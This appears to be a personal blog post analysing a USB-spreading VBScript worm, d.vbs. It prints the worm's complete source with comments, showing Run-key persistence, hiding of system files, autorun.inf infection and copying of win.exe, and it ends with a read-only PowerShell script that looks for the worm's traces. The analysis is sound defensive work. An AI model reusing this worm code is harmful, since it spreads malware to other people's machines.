For quite a few weeks I had been having a slow PC, one that was eventually dying for a restart. I turned off all of the Windows services, I removed all unnecessary software and even some that was necessary but used infrequently. Still to no avail. Then I went through my registry to clean up unwanted Run and RunOnce entries.

As I turned on the computer I could see a lot of wscript.exe instances running, tens of them, hogging my CPU and memory like anything. I thought it might be a network policy imposed by the network department, and I used to close all of the running scripts one by one. But an eventual talk with the network admin revealed that no PC “runs” the policy on start-up, and that they had nothing to do with the wscript.exe scripts.

Running Symantec Endpoint Protection with up-to-date virus definitions, I could not imagine a virus on my PC.

Most people think that WScript.EXE is a virus, which it is not. It is the Windows Script Host (WSH). Also, I have used WScript quite a few times myself, which is probably the reason I never thought of removing that exe.

It can execute scripts (VBScript or JScript) that you may not want run.

The following is a simple example taken from MSDN that writes to the registry.

Dim WshShell, bKey
Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\", 1, "REG_BINARY"
WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\MindReader", "Goocher!", "REG_SZ"

bKey = WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\")
WScript.Echo WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\MindReader")

WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\MindReader"
WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\"
WshShell.RegDelete "HKCU\Software\ACME\"

So, long story short, this always used to happen when I inserted my flash drive into the system. A couple of days ago, I cancelled the Action window that pops up when you insert a flash drive. I browsed the drive using Windows Explorer (Control+E) and to my astonishment I found a .VBS file, which is a VBScript file. I renamed the file and opened it. It was the code that was hogging my PC!

Though I did not like the slow PC at all, because I couldn't work, I did interestingly enjoy reading the code (0:

The following is what I found when I opened the d.vbs file; I have added a couple of comments just to help the reader better understand the code.

On Error Resume Next ' causes execution to continue with the next statement after any run-time error
set objfso=CreateObject("Scripting.fileSystemObject") ' File system access
Set ws = CreateObject("wscript.Shell") ' Create a shell object
Set sh = CreateObject("Shell.application")
sour="C:\Tempe" ' Drop folder on the local disk
if objfso.FolderEXists(sour) Then ' Look for a folder
set tf =objfso.getFolder(sour)
tf.Attributes=39 ' 39 = ReadOnly(1)+Hidden(2)+System(4)+Archive(32); hidden+system makes Explorer treat it as a protected OS file
End If

a=0
b=10
c=10

'Tweaking the registry: persistence through the HKCU Run key, under the innocent-looking value name "Explorer"
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer", sour & "\" &"d.vbs"
' Turn off the display of hidden and protected OS files so the dropped files stay invisible in Explorer
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
if a=0 Then

if objfso.FileExists("C:\Tempe\win.exe") Then ' win.exe is a second dropped file; its contents are not shown in this post
ws.Run("C:\Tempe\win.exe")
end if
end if

Do ' Main loop: walk every drive and seed the removable ones
For Each flashdrive In objfso.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then ' drivetype 1 = removable, 2 = fixed; skip the floppy

If (flashdrive.drivetype = 1) Then ' Only removable drives get infected
pet=flashdrive.path & "\"

' Drop an autorun.inf so that opening the drive launches d.vbs (AutoRun honoured this on older Windows)
set tf=objfso.createtextfile(pet & "autorun.inf")
tf.writeline "[autorun]"
tf.writeline "shellexecute=wscript.exe d.vbs"
tf.writeline "shell=Open"
tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
tf.writeline "Action=Open to View Folder"
tf.writeline "Icon=tere.ico"
tf.close
set tf =objfso.getfile(pet & "autorun.inf")
tf.Attributes=39

if objfso.FileExists(pet&"autorun.inf") Then
set f = objfso.getfile(pet&"autorun.inf")
size = f.size
set text=f.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
end if
if tf=source Then
sour="C:\Tempe"
Else
set f = objfso.getfile(pet&"autorun.inf")
objfso.DeleteFile(f)
End If

If a=0 Then
' Opens the drive root through the shell and starts the dropped executable; on older Windows opening the
' drive can trigger the autorun.inf just written, which starts yet another copy of d.vbs
ws.Run(pet)
ws.run(pet&"win.exe")
End If
a=a+1
sour="C:\Tempe"
pet=flashdrive.path & "\"
dest=flashdrive.path & "\Tempe"
sours="C:\Tempe\"

if a=3 Then
If objfso.FileExists(pet&"autorun.inf") Then
objfso.DeleteFile(pet&"autorun.inf")

set Fol=objfso.GetFolder(sour)
set tf=objfso.createtextfile(pet & "autorun.inf")
tf.writeline "[autorun]"
tf.writeline "shellexecute=wscript.exe d.vbs"
tf.writeline "shell=Open"
tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
tf.writeline "Action=Open to View Folder"
tf.writeline "Icon=tere.ico"
tf.close

set tf =objfso.getfile(pet & "autorun.inf")
tf.Attributes=39

End If
End If

If objfso.FileExists(pet&"d.vbs") Then
sour="C:\Tempe"
Else ' Copy the three components (script, executable, icon) onto the drive and hide them
set Fol=objfso.GetFolder(sour)
set f=objfso.GetFile(Fol&"\d.vbs") ' Fol's default property is its Path, so this is "C:\Tempe\d.vbs"
objfso.CopyFile f, pet, OverWriteFiles
set f =objfso.getfile(pet & "d.vbs")
f.Attributes=39

set f=objfso.GetFile(Fol&"\win.exe")
objfso.CopyFile f, pet, OverWriteFiles
set f =objfso.getfile(pet & "win.exe")
f.Attributes=39

set f=objfso.GetFile(Fol&"\tere.ico")
objfso.CopyFile f, pet, OverWriteFiles
set f =objfso.getfile(pet & "tere.ico")
f.Attributes=39
set tf=objfso.createtextfile(pet & "autorun.inf")
tf.writeline "[autorun]"
tf.writeline "shellexecute=wscript.exe d.vbs"
tf.writeline "shell=Open"
tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
tf.writeline "Action=Open to View Folder"
tf.writeline "Icon=tere.ico"
tf.close
set tf =objfso.getfile(pet & "autorun.inf")
tf.Attributes=39

set mf = objfso.getfile(pet&"autorun.inf")
size = mf.size
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
End If

If objfso.FolderExists (sour) Then
set Fol=objfso.GetFolder(sour)
End If

If objfso.FileExists("C:\Tempe\d.vbs") Then
sour="C:\Tempe"
Else ' Clean PC: copy the components from the drive back into C:\Tempe
set tf=objfso.createFolder("C:\"& "Tempe")
set Fol=objfso.GetFolder(sour)
Fol.Attributes=39
set f=objfso.GetFile(pet&"d.vbs")
objfso.CopyFile f, sours, OverWriteFiles
set f =objfso.getfile(sour & "\d.vbs")
f.Attributes=39
set f=objfso.GetFile(pet&"tere.ico")
objfso.CopyFile f, sours, OverWriteFiles
set f =objfso.getfile(sour & "\tere.ico")
f.Attributes=39
set f=objfso.GetFile(pet&"win.exe")
objfso.CopyFile f, sours, OverWriteFiles
set f =objfso.getfile(sour & "\win.exe")
f.Attributes=39
End If

set mf = objfso.getfile(pet&"autorun.inf")
size = mf.size
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
if a=3 Then
a=1
End If
End If
End If
Next
if check1 Then ' check1 is never assigned, so it evaluates as False
Wscript.sleep 10000
end if

' Appends the script's own source text to the same string buffer
set mf = objfso.getfile(Wscript.ScriptFullname)
size = mf.size
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
Loop While (check1)
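As an added, defender-side companion to the script above (this is not part of the original post): a read-only PowerShell triage that looks for the traces this worm leaves on a Windows machine. It assumes the drop folder C:\Tempe and the Run value name "Explorer" seen in the code, and only reports; it deletes nothing.

```powershell
# Added triage script (not from the original post). Read-only: reports indicators, changes nothing.
$findings = @()

# 1. Running wscript.exe instances and the script each one was started with
Get-CimInstance -ClassName Win32_Process -Filter "Name = 'wscript.exe'" | ForEach-Object {
    $findings += "wscript.exe PID $($_.ProcessId): $($_.CommandLine)"
}

# 2. HKCU Run entries that launch a .vbs (the worm registered itself under the name "Explorer")
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$run = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
if ($run) {
    foreach ($p in $run.PSObject.Properties) {
        # PS* properties are PowerShell provider metadata, not registry values
        if ($p.Name -notlike 'PS*' -and "$($p.Value)" -match '(?i)\.vbs|wscript') {
            $findings += "Run value '$($p.Name)' -> $($p.Value)"
        }
    }
}

# 3. Explorer settings the worm changes so that hidden+system (attribute 39) files stay invisible
$advKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
$adv = Get-ItemProperty -Path $advKey -ErrorAction SilentlyContinue
if ($adv -and $adv.ShowSuperHidden -eq 0) { $findings += 'ShowSuperHidden = 0 (protected OS files are hidden)' }
if ($adv -and $null -ne $adv.SuperHidden)  { $findings += "SuperHidden value present = $($adv.SuperHidden)" }

# 4. autorun.inf on removable drives (DriveType 2) that points at wscript.exe
Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DriveType = 2" | ForEach-Object {
    $inf = "$($_.DeviceID)\autorun.inf"
    if (Test-Path -LiteralPath $inf) {
        $text = Get-Content -LiteralPath $inf -Raw -ErrorAction SilentlyContinue
        if ($text -match '(?i)wscript\.exe') { $findings += "$inf launches a script through wscript.exe" }
    }
}

# 5. The drop folder; -Force is needed because the files carry the Hidden and System attributes
if (Test-Path -LiteralPath 'C:\Tempe') {
    Get-ChildItem -LiteralPath 'C:\Tempe' -Force | ForEach-Object {
        $findings += "C:\Tempe\$($_.Name) [$($_.Attributes)]"
    }
}

if ($findings.Count -eq 0) { 'No indicators found.' } else { $findings }
```

Run it from an elevated PowerShell prompt on the suspect machine; anything it lists should be verified before removal, since a legitimate logon script can also appear under wscript.exe.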

Happy diagnosing the virus! (0:
